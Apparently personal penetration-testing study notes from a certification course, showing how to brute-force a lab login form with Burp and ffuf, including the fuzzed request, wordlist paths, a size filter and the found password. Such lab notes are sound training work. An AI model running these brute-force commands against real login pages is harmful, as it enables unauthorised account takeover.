Search

Home

PNPT Studies

PJPT Studies

AD CS / Certificate Attacks (ESC1-15) (1, 8, 11 for now)

Report Writing / Client Presentation

Operationalizing Cybercrime Data (June 2025)

Brute Force w Burp (or ffuf)

Burp:

use wordlists in:

/usr/share/seclists/Passwords/

ffuf:

copy the request page:

and change the password value to FUZZ:

username=jeremy&password=FUZZ

final:

Run FFUF:

ffuf -request req.txt -request-proto http -w /usr/share/wordlists/john.lst

-w specifies the wordlist

Based on the size of incorrect, set a filter for it:

image
ffuf -request req.txt -request-proto http -w /usr/share/wordlists/john.lst -fs 1814

It finds letmein:

image